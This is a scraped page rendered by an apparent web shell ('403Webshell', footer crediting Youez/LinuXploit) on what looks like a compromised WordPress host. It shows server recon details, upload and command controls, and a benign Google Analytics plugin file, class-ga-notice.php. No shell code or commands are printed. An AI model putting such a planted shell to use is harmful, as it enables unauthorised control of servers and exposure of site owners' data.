403Webshell
Server IP : 74.208.236.52  /  Your IP : 216.73.216.240
Web Server : Apache
System : Linux infong527 4.4.400-icpu-115 #2 SMP Mon Jul 6 08:15:05 UTC 2026 x86_64
User : u44043973 ( 5404757)
PHP Version : 8.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/cwd/wp-content/plugins/googleanalytics/class/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/cwd/wp-content/plugins/googleanalytics/class/class-ga-notice.php
<?php
/**
 * Google Analytics notice.
 *
 * @package GoogleAnalytics
 */

/**
 * Notice class.
 */
class Ga_Notice {

	/**
	 * Get translated error message.
	 *
	 * @param string $error Error string.
	 *
	 * @return string Translated error string.
	 */
	public static function get_message( $error ) {
		$message = '';

		if ( Ga_Helper::GA_DEBUG_MODE ) {
			$message = Ga_Helper::ga_wp_notice(
				( ! empty( $error['class'] ) ? esc_html( '[' . $error['class'] . ']' ) : '' ) . ' ' . $error['message'],
				'error'
			);
		} elseif ( 'Ga_Lib_Google_Api_Client_AuthCode_Exception' === $error['class'] ) {
			$message = Ga_Helper::ga_wp_notice( $error['message'], 'error' );
		} elseif ( 'Ga_Lib_Sharethis_Api_Client_InvalidDomain_Exception' === $error['class'] ) {
			$message = Ga_Helper::ga_wp_notice( $error['message'], 'error' );
		} elseif ( 'Ga_Lib_Sharethis_Api_Client_Invite_Exception' === $error['class'] ) {
			$message = Ga_Helper::ga_wp_notice( $error['message'], 'error' );
		} elseif (
			in_array(
				$error['class'],
				array( 'Ga_Lib_Sharethis_Api_Client_Verify_Exception', 'Ga_Lib_Sharethis_Api_Client_Alerts_Exception' ),
				true
			)
		) {
			$message = Ga_Helper::ga_wp_notice( $error['message'], 'error' );
		} elseif ( 'Ga_Data_Outdated_Exception' === $error['class'] ) {
			$message = Ga_Helper::ga_wp_notice( $error['message'], 'warning' );
		} else {
			$message = Ga_Helper::ga_wp_notice(
				__( 'There are temporary connection issues, please try again later or go to Google Analytics website to see the dashboards' ),
				'error'
			);
		}

		return $message;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit